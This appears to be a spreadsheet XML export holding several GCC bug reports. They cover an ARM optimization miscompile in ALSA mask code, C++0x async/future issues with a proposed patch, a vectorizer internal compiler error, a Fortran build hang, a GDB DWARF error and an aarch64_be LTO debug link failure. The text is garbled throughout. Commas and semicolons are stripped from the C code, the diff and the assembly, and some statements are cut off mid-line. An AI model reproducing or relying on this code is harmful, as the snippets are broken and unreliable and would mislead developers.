See  for instructions.
Tested revisions:
r166509 - crash
r163636 - crash
r161659 - OK
4.5 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-27363</t>
  </si>
  <si>
    <t>ARM gcc 4.1 optimization bug</t>
  </si>
  <si>
    <t>The kernel is 2.6.14. When I build ALSA subsystem. I use following commandline:
arm-iwmmxt-linux-gnueabi-gcc -Wp-MDsound/core/.pcm_native.o.d
-nostdinc -isystem
/usr/local/arm-iwmmxt-linux-gnueabi/bin/../lib/gcc/arm-iwmmxt-linux-gnueabi/4.1.0/include
-D__KERNEL__ -Iinclude  -include include/linux/autoconf.h
-mlittle-endian -gdwarf-2 -Wall -Wundef -Wstrict-prototypes
-Wno-trigraphs -fno-strict-aliasing -fno-common -ffreestanding
-fno-omit-frame-pointer -fno-optimize-sibling-calls -gdwarf-2
-fno-omit-frame-pointer -mapcs -mno-sched-prolog -mabi=aapcs-linux
-mno-thumb-interwork -D__LINUX_ARM_ARCH__=5 -march=armv5te
-mtune=xscale -Wa-mcpu=xscale  -msoft-float -Uarm
-Wdeclaration-after-statement -Wno-pointer-sign   -gdwarf-2
-DKBUILD_BASENAME=pcm_native -DKBUILD_MODNAME=snd_pcm -Os -c -o
sound/core/pcm_native.o sound/core/pcm_native.c
And the function is like following (using
arm-iwmmxt-linux-gnueabi-objdump -d pcm_nativ.o):
0000211c :
   211c:       e1a0c00d        mov     ip sp
   2120:       e92dd8f0        stmdb   sp! {r4 r5 r6 r7 fp ip lr pc}
   2124:       e24cb004        sub     fp ip #4       0x4
   2128:       e24dd020        sub     sp sp #32      0x20
   212c:       e5913000        ldr     r3 [r1]
   2130:       e51b502c        ldr     r5 [fp #-44]
   2134:       e24b603c        sub     r6 fp #60      0x3c
   2138:       e1a0c000        mov     ip r0
   213c:       e1a0e006        mov     lr r6
   2140:       e1a04000        mov     r4 r0
   2144:       e0055003        and     r5 r5 r3
   2148:       e1a07001        mov     r7 r1
   214c:       e8bc000f        ldmia   ip! {r0 r1 r2 r3}
   2150:       e8ae000f        stmia   lr! {r0 r1 r2 r3}
   2154:       e89c000f        ldmia   ip {r0 r1 r2 r3}
   2158:       e5845000        str     r5 [r4]
   215c:       e597c004        ldr     ip [r7 #4]
   2160:       e3550000        cmp     r5 #0   0x0
   2164:       e88e000f        stmia   lr {r0 r1 r2 r3}
   2168:       e001300c        and     r3 r1 ip              /* r1 from
                                                                  2154:        e89c000f        ldmia   ip {r0 r1 r2 r3}
                                                                  Using the wrong value.
                                                                  The r1 from this instruction should be used:
                                                                  214c:   ldmia        ip! {r0 r1 r2 r3}
                                                               */
   216c:       e1a00004        mov     r0 r4
   2170:       e3a02008        mov     r2 #8   0x8
   2174:       e1a01006        mov     r1 r6
   2178:       e5843004        str     r3 [r4 #4]
   217c:       1a000005        bne     2198 
   2180:       e3530000        cmp     r3 #0   0x0
   2184:       e3e03015        mvn     r3 #21  0x15
   2188:       1a000002        bne     2198 
   218c:       e1a00003        mov     r0 r3
   2190:       e24bd01c        sub     sp fp #28      0x1c
   2194:       e89da8f0        ldmia   sp {r4 r5 r6 r7 fp sp pc}
   2198:       ebfffffe        bl      0 
   219c:       e2503000        subs    r3 r0 #0       0x0
   21a0:       13a03001        movne   r3 #1   0x1
   21a4:       eafffff8        b       218c 
The C code is like following:
#define SNDRV_MASK_SIZE 2
struct mask_t {
       unsigned int bits[8]
}
typedef struct mask_t snd_mask_t
static inline int snd_mask_empty(const snd_mask_t *mask)
{
       int i
       for (i = 0 i &lt; SNDRV_MASK_SIZE i++) {
               if (mask-&gt;bits[i])
                       return 0
       }
       return 1
}
static inline void snd_mask_intersect(snd_mask_t *mask const snd_mask_t *v)
{
       int i
       for (i = 0 i &lt; SNDRV_MASK_SIZE i++)
               mask-&gt;bits[i] 
}
static inline void snd_mask_copy(snd_mask_t *mask const snd_mask_t *v)
{
       *mask = *v
}
int snd_mask_refine(snd_mask_t *mask const snd_mask_t *v)
{
       snd_mask_t old
       snd_mask_copy(
       snd_mask_intersect(mask v)
       if (snd_mask_empty(mask))
               return -1
       return !snd_mask_eq(mask 
       return 1
}
When I remove the -O option the ALSA works OK. the .s file is like following:
00000040 :
     40:       e1a0c00d        mov     ip sp
     44:       e92dd800        stmdb   sp! {fp ip lr pc}
     48:       e24cb004        sub     fp ip #4       0x4
     4c:       e24dd048        sub     sp sp #72      0x48
     50:       e50b0048        str     r0 [fp #-72]
     54:       e50b104c        str     r1 [fp #-76]
     58:       e51b3048        ldr     r3 [fp #-72]
     5c:       e24be040        sub     lr fp #64      0x40
     60:       e1a0c003        mov     ip r3
     64:       e8bc000f        ldmia   ip! {r0 r1 r2 r3}
     68:       e8ae000f        stmia   lr! {r0 r1 r2 r3}
     6c:       e89c000f        ldmia   ip {r0 r1 r2 r3}
     70:       e88e000f        stmia   lr {r0 r1 r2 r3}
     74:       e3a03000        mov     r3 #0   0x0
     78:       e50b3020        str     r3 [fp #-32]
     7c:       ea00000c        b       b4 
     80:       e51b0020        ldr     r0 [fp #-32]
     84:       e51b2020        ldr     r2 [fp #-32]
     88:       e51b3048        ldr     r3 [fp #-72]
     8c:       e7931102        ldr     r1 [r3 r2 lsl #2]
     90:       e51b2020        ldr     r2 [fp #-32]
     94:       e51b304c        ldr     r3 [fp #-76]
     98:       e7933102        ldr     r3 [r3 r2 lsl #2]
     9c:       e0012003        and     r2 r1 r3
     a0:       e51b3048        ldr     r3 [fp #-72]
     a4:       e7832100        str     r2 [r3 r0 lsl #2]
     a8:       e51b3020        ldr     r3 [fp #-32]
     ac:       e2833001        add     r3 r3 #1       0x1
     b0:       e50b3020        str     r3 [fp #-32]
     b4:       e51b3020        ldr     r3 [fp #-32]
     b8:       e3530001        cmp     r3 #1   0x1
     bc:       daffffef        ble     80 
     c0:       e51b3048        ldr     r3 [fp #-72]
     c4:       e50b3018        str     r3 [fp #-24]
     c8:       e3a03000        mov     r3 #0   0x0
     cc:       e50b301c        str     r3 [fp #-28]
     d0:       ea00000a        b       100 
     d4:       e51b301c        ldr     r3 [fp #-28]
     d8:       e51b2018        ldr     r2 [fp #-24]
     dc:       e7923103        ldr     r3 [r2 r3 lsl #2]
     e0:       e3530000        cmp     r3 #0   0x0
     e4:       0a000002        beq     f4 
     e8:       e3a03000        mov     r3 #0   0x0
     ec:       e50b3050        str     r3 [fp #-80]
     f0:       ea000007        b       114 
     f4:       e51b301c        ldr     r3 [fp #-28]
     f8:       e2833001        add     r3 r3 #1       0x1
     fc:       e50b301c        str     r3 [fp #-28]
    100:       e51b301c        ldr     r3 [fp #-28]
    104:       e3530001        cmp     r3 #1   0x1
    108:       dafffff1        ble     d4 
    10c:       e3a03001        mov     r3 #1   0x1
    110:       e50b3050        str     r3 [fp #-80]
    114:       e51b3050        ldr     r3 [fp #-80]
    118:       e3530000        cmp     r3 #0   0x0
    11c:       0a000002        beq     12c 
    120:       e3e03015        mvn     r3 #21  0x15
    124:       e50b3054        str     r3 [fp #-84]
    128:       ea00000f        b       16c 
    12c:       e51b3048        ldr     r3 [fp #-72]
    130:       e50b3010        str     r3 [fp #-16]
    134:       e24b3040        sub     r3 fp #64      0x40
    138:       e50b3014        str     r3 [fp #-20]
    13c:       e51b0010        ldr     r0 [fp #-16]
    140:       e51b1014        ldr     r1 [fp #-20]
    144:       e3a02008        mov     r2 #8   0x8
    148:       ebfffffe        bl      0 
    14c:       e1a03000        mov     r3 r0
    150:       e3530000        cmp     r3 #0   0x0
    154:       13a03000        movne   r3 #0   0x0
    158:       03a03001        moveq   r3 #1   0x1
    15c:       e3530000        cmp     r3 #0   0x0
    160:       13a03000        movne   r3 #0   0x0
    164:       03a03001        moveq   r3 #1   0x1
    168:       e50b3054        str     r3 [fp #-84]
    16c:       e51b3054        ldr     r3 [fp #-84]
    170:       e1a00003        mov     r0 r3
    174:       e24bd00c        sub     sp fp #12      0xc
    178:       e89da800        ldmia   sp {fp sp pc}</t>
  </si>
  <si>
    <t>yfw.debian</t>
  </si>
  <si>
    <t>GCC-49204</t>
  </si>
  <si>
    <t xml:space="preserve">[C++0x] remaining issues in </t>
  </si>
  <si>
    <t>(this is a placeholder and reminder to myself)
We don't return future_status from the timed waiting functions.
The requirements for async say:
 If the implementation chooses the launch::async policy
   â€” a call to a waiting function on an asynchronous return object that
     shares the shared state created by this async call shall block until
     the associated thread has completed as if joined (30.3.1.5)
The current implementation doesn't meet this requirement
_Async_state::_M_do_run could make the state ready and unblock waiters
before the thread completes.
Proposed fix: _State_base::_M_wait() already calls _M_run_deferred()
to give a deferred function a chance to run we could add override it
as _Async_state::_M_run_deferred() and join the thread.
@@ -13257 +13257 @@
   _M_thread(mem_fn(&amp;_Async_state::_M_do_run) this)
      { }
-      ~_Async_state() { _M_thread.join() }
+      ~_Async_state() { _M_join() }
    private:
      void _M_do_run()
@@ -133411 +133418 @@
        _M_set_result(std::move(__setter))
      }
+      void _M_run_deferred()
+      { _M_join() }
+
+      void _M_join()
+      { std::call_once(_M_once  }
+
      template friend class _Task_setter
      typedef typename __future_base::_Ptr&gt;::type _Ptr_type
      _Ptr_type _M_result
      std::function _M_fn
      thread _M_thread
+      once_flag _M_once
    }
  /// async
That would ensure non-timed waiting functions block as if joined.  It
doesn't handle non-timed waiting functions but I'm not convinced they
should block.</t>
  </si>
  <si>
    <t>GCC-21050</t>
  </si>
  <si>
    <t>[4.1 Regression] vect-111.c ICE</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/vect/vect-none.c (test for excess errors)
appeared on ia64-hpux (both -milp32 and -mlp64) on mainline between 20050413 and
20050414.  gcc-testresults shows it also present on ia64-linux and I would guess
it is the same failure.
vect-none.c: In function 'foo':
vect-none.c:181: error: unrecognizable insn:
(insn 423 422 424 11 (set (reg:V2SF 660)
        (lt:V2SF (const_vector:V2SF [
                    (const_double:SF 0.0 [0x0.0p+0])
                    (const_double:SF 0.0 [0x0.0p+0])
                ])
            (reg:V2SF 510 [ vect_var_.70 ]))) -1 (insn_list:REG_DEP_TRUE 422 (nil))
    (nil))
vect-none.c:181: internal compiler error: in extract_insn at recog.c:2082
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-81723</t>
  </si>
  <si>
    <t>[7 Regression] fortran build doesn't terminate on 64bit targets</t>
  </si>
  <si>
    <t>seen when building the cernlib package on 64bit targets. the build succeeds on 32bit targets.
[...]
gfortran csqrtk.F
gfortran cwerf64.F
Session terminated terminating shell... ...terminated.
make[1]: *** wait: No child processes.  Stop.
make[1]: *** Waiting for unfinished jobs....
make[1]: *** wait: No child processes.  Stop.
Makefile:322: recipe for target 'archive/cwerf64.o' failed
make[5]: *** [archive/cwerf64.o] Terminated
complete build logs at
https://launchpad.net/ubuntu/+source/cernlib/20061220+dfsg3-4.3build1
the build doesn't show the command line parameters need to complete this report ...</t>
  </si>
  <si>
    <t>GCC-4892</t>
  </si>
  <si>
    <t>Dwarf Error: Cannot handle DW_FORM_strp in DWARF reader at program load in GDB</t>
  </si>
  <si>
    <t>After compile program (c++ sources) using cvs mainline gcc.
gdb print error at load program:
Dwarf Error: Cannot handle DW_FORM_strp in DWARF reader
.
and at breakpoint and next backtrace command gdb print:
#0  0x08094574 in ?? ()
#1  0x08094a6d in ?? ()
#2  0x08092960 in ?? ()
#3  0x08090362 in ?? ()
#4  0x080900f1 in ?? ()
#5  0x0804e668 in ?? ()
....
Release:
gcc version 3.1 20011106 (experimental)
Environment:
i386-unknown-freebsd4.3
GNU gdb 5.0</t>
  </si>
  <si>
    <t>GCC-81925</t>
  </si>
  <si>
    <t>early lto debug link failure on aarch64_be</t>
  </si>
  <si>
    <t>Created attachment 42025
save-temps and other output files
following works without -g with -g linking fails
readelf reports errors on linker input files are
attached in a tar:
$ ./aarch64_be-none-elf-gcc -flto -specs=rdimon.specs -g a.c -v -save-temps
Using built-in specs.
Reading specs from /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/lib/rdimon.specs
rename spec lib to libc
COLLECT_GCC=./aarch64_be-none-elf-gcc
COLLECT_LTO_WRAPPER=/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/lto-wrapper
Target: aarch64_be-none-elf
Configured with: /home/szabolcs/w/b/src/gcc/configure --target=aarch64_be-none-elf --prefix=/home/szabolcs/w/b/build-aarch64_be-none-elf/install --with-gmp=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-mpfr=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-mpc=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-isl=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-pkgversion=unknown --disable-shared --disable-nls --disable-threads --disable-tls --enable-checking=yes --enable-languages=cc++fortran --with-newlib : (reconfigured) 
Thread model: single
gcc version 8.0.0 20170821 (experimental) (unknown) 
COLLECT_GCC_OPTIONS='-flto' '-specs=rdimon.specs' '-g' '-v' '-save-temps' '-mbig-endian' '-mabi=lp64'
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/cc1 -E -quiet -v a.c -mbig-endian -mabi=lp64 -flto -g -fworking-directory -fpch-preprocess -o a.i
ignoring nonexistent directory /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/sys-include
#include ... search starts here:
#include  search starts here:
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/include
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/include-fixed
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/include
End of search list.
COLLECT_GCC_OPTIONS='-flto' '-specs=rdimon.specs' '-g' '-v' '-save-temps' '-mbig-endian' '-mabi=lp64'
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/cc1 -fpreprocessed a.i -quiet -dumpbase a.c -mbig-endian -mabi=lp64 -auxbase a -g -version -flto -o a.s
GNU C11 (unknown) version 8.0.0 20170821 (experimental) (aarch64_be-none-elf)
	compiled by GNU C version 6.3.0 20170406 GMP version 4.3.2 MPFR version 3.0.0 MPC version 0.8.2 isl version isl-0.15-2-g00f2e0ca-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C11 (unknown) version 8.0.0 20170821 (experimental) (aarch64_be-none-elf)
	compiled by GNU C version 6.3.0 20170406 GMP version 4.3.2 MPFR version 3.0.0 MPC version 0.8.2 isl version isl-0.15-2-g00f2e0ca-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: c56b6c42715c65bbcbf1872ac0fefbbe
COLLECT_GCC_OPTIONS='-flto' '-specs=rdimon.specs' '-g' '-v' '-save-temps' '-mbig-endian' '-mabi=lp64'
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/bin/as -EB -mabi=lp64 -o a.o a.s
COMPILER_PATH=/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/bin/
LIBRARY_PATH=/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/lib/
COLLECT_GCC_OPTIONS='-flto' '-specs=rdimon.specs' '-g' '-v' '-save-temps' '-mbig-endian' '-mabi=lp64'
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/collect2 -plugin /home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/liblto_plugin.so -plugin-opt=/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/lto-wrapper -plugin-opt=-fresolution=a.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lg -plugin-opt=-pass-through=-lc -plugin-opt=-pass-through=-lrdimon -plugin-opt=-pass-through=-lgcc -flto -EB -X -maarch64elfb /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/crti.o /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/crtbegin.o /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/lib/crt0.o -L/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0 -L/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/lib a.o -lgcc --start-group -lg -lc -lrdimon --end-group -lgcc /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/crtend.o /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/crtn.o
/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/lto-wrapper -fresolution=a.res -flinker-output=exec a.o 
./aarch64_be-none-elf-gcc @/tmp/ccEMJ7Ax
Using built-in specs.
Reading specs from /home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/lib/rdimon.specs
rename spec lib to libc
COLLECT_GCC=./aarch64_be-none-elf-gcc
Target: aarch64_be-none-elf
Configured with: /home/szabolcs/w/b/src/gcc/configure --target=aarch64_be-none-elf --prefix=/home/szabolcs/w/b/build-aarch64_be-none-elf/install --with-gmp=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-mpfr=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-mpc=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-isl=/home/szabolcs/w/b/build-aarch64_be-none-elf/host-tools --with-pkgversion=unknown --disable-shared --disable-nls --disable-threads --disable-tls --enable-checking=yes --enable-languages=cc++fortran --with-newlib : (reconfigured) 
Thread model: single
gcc version 8.0.0 20170821 (experimental) (unknown) 
COLLECT_GCC_OPTIONS='-c' '-fno-openmp' '-fno-openacc' '-mbig-endian' '-mabi=lp64' '-specs=rdimon.specs' '-g' '-v' '-save-temps' '-mbig-endian' '-mabi=lp64' '-fltrans-output-list=/tmp/cclG2Oek.ltrans.out' '-fwpa' '-fresolution=a.res' '-flinker-output=exec'
 /home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/lto1 -quiet -dumpbase a.o -mbig-endian -mabi=lp64 -mbig-endian -mabi=lp64 -auxbase a -g -version -fno-openmp -fno-openacc -fltrans-output-list=/tmp/cclG2Oek.ltrans.out -fwpa -fresolution=a.res -flinker-output=exec @/tmp/cc6F2Snn
GNU GIMPLE (unknown) version 8.0.0 20170821 (experimental) (aarch64_be-none-elf)
	compiled by GNU C version 6.3.0 20170406 GMP version 4.3.2 MPFR version 3.0.0 MPC version 0.8.2 isl version isl-0.15-2-g00f2e0ca-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU GIMPLE (unknown) version 8.0.0 20170821 (experimental) (aarch64_be-none-elf)
	compiled by GNU C version 6.3.0 20170406 GMP version 4.3.2 MPFR version 3.0.0 MPC version 0.8.2 isl version isl-0.15-2-g00f2e0ca-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
COMPILER_PATH=/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/bin/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/libexec/gcc/aarch64_be-none-elf/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/bin/
LIBRARY_PATH=/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/:/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/lib/
COLLECT_GCC_OPTIONS='-c' '-fno-openmp' '-fno-openacc' '-mbig-endian' '-mabi=lp64' '-specs=rdimon.specs' '-g' '-v' '-save-temps' '-mbig-endian' '-mabi=lp64' '-fltrans-output-list=/tmp/cclG2Oek.ltrans.out' '-fwpa' '-fresolution=a.res' '-flinker-output=exec'
./aarch64_be-none-elf-gcc -mbig-endian -mabi=lp64 -r -nostdlib -o /tmp/ccHSUHHJdebugobj /tmp/ccEnQGOVdebugobjtem
/tmp/ccEnQGOVdebugobjtem: file not recognized: Bad value
collect2: error: ld returned 1 exit status
lto-wrapper: fatal error: ./aarch64_be-none-elf-gcc returned 1 exit status
compilation terminated.
[Leaving LTRANS /tmp/cclG2Oek.ltrans.out]
[Leaving LTRANS /tmp/ccHSUHHJdebugobj]
/home/szabolcs/w/b/build-aarch64_be-none-elf/install/lib/gcc/aarch64_be-none-elf/8.0.0/../../../../aarch64_be-none-elf/bin/ld: error: lto-wrapper failed
collect2: error: ld returned 1 exit status
$ ./aarch64_be-none-elf-readelf -aW a.o
ELF Header:
  Magic:   7f 45 4c 46 02 02 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement big endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              REL (Relocatable file)
  Machine:                           AArch64
  Version:                           0x1
  Entry point address:               0x0
  Start of program headers:          0 (bytes into file)
  Start of section headers:          2232 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           0 (bytes)
  Number of program headers:         0
  Size of section headers:           64 (bytes)
  Number of section headers:         20
  Section header string table index: 19
Section Headers:
  [Nr] Name              Type            Address          Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            0000000000000000 000000 000000 00      0   0  0
  [ 1] .text             PROGBITS        0000000000000000 000040 000000 00  AX  0   0  1
  [ 2] .data             PROGBITS        0000000000000000 000040 000000 00  WA  0   0  1
  [ 3] .bss              NOBITS          0000000000000000 000040 000000 00  WA  0   0  1
  [ 4] .gnu.debuglto_.debug_info PROGBITS        0000000000000000 000040 00002c 00      0   0  1
  [ 5] .rela.gnu.debuglto_.debug_info RELA            0000000000000000 0006d0 000060 18   I 17   4  8
  [ 6] .gnu.debuglto_.debug_abbrev PROGBITS        0000000000000000 00006c 000028 00      0   0  1
  [ 7] .gnu.debuglto_.debug_str PROGBITS        0000000000000000 000094 000085 01  MS  0   0  1
  [ 8] .gnu.lto_.inline.df9efabfe7eb7929 PROGBITS        0000000000000000 000119 000028 00   E  0   0  1
  [ 9] .gnu.lto_.jmpfuncs.df9efabfe7eb7929 PROGBITS        0000000000000000 000141 000012 00   E  0   0  1
  [10] .gnu.lto_main.df9efabfe7eb7929 PROGBITS        0000000000000000 000153 0000f6 00   E  0   0  1
  [11] .gnu.lto_.symbol_nodes.df9efabfe7eb7929 PROGBITS        0000000000000000 000249 000023 00   E  0   0  1
  [12] .gnu.lto_.refs.df9efabfe7eb7929 PROGBITS        0000000000000000 00026c 00000f 00   E  0   0  1
  [13] .gnu.lto_.decls.df9efabfe7eb7929 PROGBITS        0000000000000000 00027b 000180 00   E  0   0  1
  [14] .gnu.lto_.symtab.df9efabfe7eb7929 PROGBITS        0000000000000000 0003fb 000014 00   E  0   0  1
  [15] .gnu.lto_.opts    PROGBITS        0000000000000000 00040f 000080 00   E  0   0  1
  [16] .comment          PROGBITS        0000000000000000 00048f 00002e 01  MS  0   0  1
  [17] .symtab           SYMTAB          0000000000000000 0004c0 0001e0 18     18  17  8
  [18] .strtab           STRTAB          0000000000000000 0006a0 00002e 00      0   0  1
  [19] .shstrtab         STRTAB          0000000000000000 000730 000188 00      0   0  1
Key to Flags:
  W (write) A (alloc) X (execute) M (merge) S (strings) I (info)
  L (link order) O (extra OS processing required) G (group) T (TLS)
  C (compressed) x (unknown) o (OS specific) E (exclude)
  p (processor specific)
There are no section groups in this file.
There are no program headers in this file.
There is no dynamic section in this file.
Relocation section '.rela.gnu.debuglto_.debug_info' at offset 0x6d0 contains 4 entries:
    Offset             Info             Type               Symbol's Value  Symbol's Name + Addend
0000000000000006  0000000600000102 R_AARCH64_ABS32        0000000000000000 .gnu.debuglto_.debug_abbrev + 0
000000000000000c  0000000700000102 R_AARCH64_ABS32        0000000000000000 .gnu.debuglto_.debug_str + 39
0000000000000015  0000000700000102 R_AARCH64_ABS32        0000000000000000 .gnu.debuglto_.debug_str + 0
000000000000001a  0000000700000102 R_AARCH64_ABS32        0000000000000000 .gnu.debuglto_.debug_str + 80
The decoding of unwind sections for machine type AArch64 is not currently supported.
Symbol table '.symtab' contains 20 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS a.c
     2: 0000000000000000     0 SECTION LOCAL  DEFAULT    1 
     3: 0000000000000000     0 SECTION LOCAL  DEFAULT    2 
     4: 0000000000000000     0 SECTION LOCAL  DEFAULT    3 
     5: 0000000000000000     0 SECTION LOCAL  DEFAULT    4 
     6: 0000000000000000     0 SECTION LOCAL  DEFAULT    6 
     7: 0000000000000000     0 SECTION LOCAL  DEFAULT    7 
     8: 0000000000000000     0 SECTION LOCAL  DEFAULT    8 
     9: 0000000000000000     0 SECTION LOCAL  DEFAULT    9 
    10: 0000000000000000     0 SECTION LOCAL  DEFAULT   10 
    11: 0000000000000000     0 SECTION LOCAL  DEFAULT   11 
    12: 0000000000000000     0 SECTION LOCAL  DEFAULT   12 
    13: 0000000000000000     0 SECTION LOCAL  DEFAULT   13 
    14: 0000000000000000     0 SECTION LOCAL  DEFAULT   14 
    15: 0000000000000000     0 SECTION LOCAL  DEFAULT   15 
    16: 0000000000000000     0 SECTION LOCAL  DEFAULT   16 
    17: 0000000000000000     0 NOTYPE  WEAK   HIDDEN     4 a.c.d4be4f80
    18: 0000000000000001     1 OBJECT  GLOBAL DEFAULT  COM __gnu_lto_v1
    19: 0000000000000001     1 OBJECT  GLOBAL DEFAULT  COM __gnu_lto_slim
No version information found in this file.
$ ./aarch64_be-none-elf-readelf -aW ccEnQGOVdebugobjtem 
ELF Header:
  Magic:   7f 45 4c 46 02 02 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement big endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              REL (Relocatable file)
  Machine:                           AArch64
  Version:                           0x1
  Entry point address:               0x0
  Start of program headers:          0 (bytes into file)
  Start of section headers:          64 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         0
  Size of section headers:           64 (bytes)
  Number of section headers:         21
  Section header string table index: 20
readelf: Error: Section 5 has invalid sh_entsize of 0000000000000000
readelf: Error: (Using the expected size of 24 for the rest of this dump)
readelf: Error: Section 17 has invalid sh_entsize of 0000000000000000
readelf: Error: (Using the expected size of 24 for the rest of this dump)
Section Headers:
  [Nr] Name              Type            Address          Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            0000000000000000 000000 000000 00      0   0  0
  [ 1]                   NULL            0000000000000000 000580 000000 00 AXE  0   0  1
  [ 2]                   NULL            0000000000000000 000580 000000 00 WAE  0   0  1
  [ 3]                   NULL            0000000000000000 000580 000000 00 WAE  0   0  1
  [ 4] .debug_info       PROGBITS        0000000000000000 000580 00002c 00      0   0  1
